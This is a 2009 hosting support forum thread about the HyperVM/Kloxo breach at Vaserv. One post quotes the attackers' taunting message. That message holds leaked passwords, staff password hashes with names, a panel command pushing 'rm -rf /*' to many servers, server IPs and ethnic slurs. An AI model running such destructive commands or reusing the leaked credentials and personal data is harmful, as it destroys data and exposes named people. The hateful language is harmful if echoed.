|
|
|
|
|
| Re: Multiple Security Issues in hyperVM/Kloxo [message #67713 is a reply to message #67701] |
Tue, 09 June 2009 19:33   |
|
| grk519 wrote on Tue, 09 June 2009 17:53 | HyperVM will stop working and tell you that you have exceeded vps_num -- which is 5 VPS.
So if you have more than 5 VPS and the licensing server fails HyperVM is useless.
EDIT: not sure about kloxo.
|
Not correct.
You will be fine so long as you don't run /script/upcp or 'update license,' so I recommend not doing either until we are informed about what will happen to the license server.
My Site
|
|
|
|
|
|
|
| Re: Multiple Security Issues in hyperVM/Kloxo [message #67765 is a reply to message #67091] |
Wed, 10 June 2009 07:54 |
|
Hello,
Please read this post on WHT -
www.webhostingtalk.com/showpost.php?p=6229471&postcount=214
His father and uncle are most probably employing new developers to continue LxLabs. If that is the case, in 2 weeks we will be able to see some results and can decide upon the continued use of Kloxo/HyperVM.
I wish that the great work done by Ligesh is continued for ever.
Regards
Any mods around please make this sticky. It would be my greatest pleasure in life to see LxLabs continue for i respect Ligesh for his hard work, knowledge and his products too.
[Updated on: Wed, 10 June 2009 07:56] Report message to a moderator |
|
|
|
| Re: Multiple Security Issues in hyperVM/Kloxo [message #67772 is a reply to message #67091] |
Wed, 10 June 2009 08:23 |
|
Yes. As the user ganesh-rao on WHT posted, he will be visiting his house on 15th again. That's when we can expect an update on the situation. Don't know anything about S. Bhargava, but he is active on this forum. I will PM him to discuss further.
Regards
|
|
|
| Re: Multiple Security Issues in hyperVM/Kloxo [message #67780 is a reply to message #67091] |
Wed, 10 June 2009 08:53 |
 bliss 
Messages: 288
Registered: July 2008 |
Senior Member |
|
|
Just something that some of you might be interested in which i found on my travels.
| Quote: | A day after news of a so called HyperVM 0-day that resulted in 100,000 sites being wiped out on Vaserv, the following information has come to light from an anonymous source:
|
http://pastebin.com/d258dad41 (removed from their page)
OK people are removing it everywhere, so here is a snippet off the page before it went down
| Quote: | Z3r0 day in hypervm?? plz u give us too much credit. If you really really wanna know how you got wtfpwned bitch it was ur own stupidity and excessive passwd reuse. Rus's passwds are
Code:
e2×2%sin0ei unf1shf4rt 3^%3df 1/2=%mod5 f0ster
f0ster being the latest one, quite secure eh bitches? We were in ur networks sniffing ur passwds for the past two months quite funny this openvz crap is we could just get into any VPS we like at any time thanks to ur mad passwds. But we got bored so we decided to initiate operation rmfication and hypervm was a great t00l to do that since it spared us the time of sshing into all ur 200 boxen just to issue rm -rf. Coded a little .pl to do just that, take a look at this eleet output it's mad dawg
Code:
[root@vz-vaserv .ssh]# perl h.pl -user admin -pass ****off -host cp.vaserv.com -cmd 'rm -rf /* 2> /dev/null > /dev/null &'
* Attempting to login using admin / ****off
* Logged in, showtime!
Output for 67.222.156.106
Output for xen3ws.vaserv.com
Output for vz22uk.vaserv.com
Output for xen4ws.vaserv.com
Output for vzspecial5.vaserv.com
Output for xen16.vaserv.com
Output for vz77uk.vaserv.com
Output for 91.186.26.128
Output for xen25.vaserv.com
Output for vz76uk.vaserv.com
Output for vz18tx.vaserv.com
Output for vz75uk.vaserv.com
Output for vz45uk.vaserv.com
Output for vzpent16.vaserv.com
Output for xen1tx.vaserv.com
Output for vz13tx.vaserv.com
Output for vz74uk.vaserv.com
Output for vzspecial8.vaserv.com
Output for xen24.vaserv.com
Output for vz73uk.vaserv.com
Output for rdns1.vaserv.com
Output for vz2tx.vaserv.com
Output for vz17tx.vaserv.com
Output for xen23.vaserv.com
Output for vz72uk.vaserv.com
Output for xen22.vaserv.com
Output for vzruffbuff.vaserv.com
Output for vzmario.vaserv.com
Output for xen21.vaserv.com
Output for vz71uk.vaserv.com
Output for vzspecial7.vaserv.com
Output for vz70uk.vaserv.com
Output for xen20.vaserv.com
Output for vz69uk.vaserv.com
Output for vzspecial6.vaserv.com
Output for vz7uk.vaserv.com
Output for vzspecial4.vaserv.com
Output for vzspecial3.vaserv.com
Output for xen19.vaserv.com
Output for vzspecial2.vaserv.com
Output for vzspecial1.vaserv.com
Output for vzpent3.vaserv.com
output truncated due to massive boxen outputz
[root@vz-vaserv .ssh]# rm -rf /* > /dev/null 2> /dev/null &
[1] 12399
[root@vz-vaserv .ssh]#
Did the same fo ****vps.com after resetting the passwd to hyper ve emz, it was ever so much fun you should try it sometime Rus it's GREAT!
BTW to all the customers we deleted ur loving provider is overselling their crappy 8gb nodez to hell and back, thought you'd like to know, you can also thank ur loving buddy Rus for losing ur data hihi. BTW Rus we still have ur billing system wtfpwned and baqdoored we got shitload of CCz from ur retarded customers thanks a lot buddy. Telling you this cuz we got bored of this ****, it's just too easy and monotonous so patch ur crap, if your too dumb to secure a simple web server my rate is $100/hour or one night with ur sister hauhaiahiaha.
Also wheres ur team Rus? the only ****ers i saw in ur billing sys are Kody, Vlada and u you guys work like ****ing hindus i bet but ur cheap like jews lolz hire some pros like me to help you out manage all those retards VPSs lolololl
Code:
1 1 rghf c32f3310baffcb431875a67196e99ebd Rus F zswlxxoomx@nowmymail.com 0 ,
Edit Delete 3 1 vlada c32f3310baffcb431875a67196e99ebd Vlada Neskovic zswlxxoomx@nowmymail.com 0 ,
Edit Delete 4 1 Kody fde67637d867c52d739931528dd92ef0 Kody Riker zswlxxoomx@nowmymail.com Georgia - server22 space 1slot 1gb 0 ,
See we care about ur privacy and edited ur emailz unlike you who do not care about the privacy of ur retarded customers lol
Code:
Showing rows 0 - 29 (1,361 total, Query took 0.0133 sec)
SELECT *
FROM `tblclients`
LIMIT 0 , 30
Fun stuff think we gonna sell all those emails to some spammers to make some quick bucks lol, and yes their main site was a VPS lolol which is why we got quick access thanks to ur passwd reuse, your awesome Rus.
Yea yea "his IP is:64.79.210.78″ here i saved u the trouble lolol
Code:
-bash-3.2# ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:16271 errors:0 dropped:0 overruns:0 frame:0
TX packets:16271 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1114930 (1.0 MiB) TX bytes:1114930 (1.0 MiB)
venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:127.0.0.1 P-t-P:127.0.0.1 Bcast:0.0.0.0 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
RX packets:33396 errors:0 dropped:0 overruns:0 frame:0
TX packets:34122 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4462516 (4.2 MiB) TX bytes:11170841 (10.6 MiB)
venet0:0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:64.79.210.78 P-t-P:64.79.210.78 Bcast:64.79.210.78 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
venet0:1 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:64.79.206.197 P-t-P:64.79.206.197 Bcast:64.79.206.197 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
venet0:2 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:67.223.225.52 P-t-P:67.223.225.52 Bcast:67.223.225.52 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
-bash-3.2# rm -rf /* 2> /dev/null > /dev/null * &
[1] 7643
-bash-3.2#
I love to rm lol bye
~Thedefaced.org
|
It looks like vaserv may of been hacked due to the owners lack of password security first and then hypervm used to contact the vps's from within his systems. (just what i read in the above post).
So it does not look like HyperVM was the sole cause of this, i think it just made it easier for the hackers. It seems they have some grudge with the boss of vaserv Rus.
Hope this info helps.
Regards
Jane
PS would be great if hypervm continues its an amazing peice of software ( in the mean time were thinking on writing a basic panel connect to our billing system dirct for basic admin of vps without hypervm until this is resolved)
[Updated on: Wed, 10 June 2009 21:50] Report message to a moderator |
|
|
|
|
|
|
|
|
|
|
|
|
|
| Re: Multiple Security Issues in hyperVM/Kloxo [message #68024 is a reply to message #67932] |
Sat, 13 June 2009 01:48 |
|
Well, look in
/usr/local/lxlabs/hypervm/sbin
It's definitively not PHP, probably one can survive with the binaries for a while, but they have to be analyzed and rewritten if the decode-track is chosen.
Someone might be able to recognize this tools from somewhere else..
But there is a high risk that some are proprietary
Computers make very fast, very accurate, miscalculations. Live Chat
|
|
|
HyperVM & Kloxo Support
Members
Search
Help
Register
Login
Home
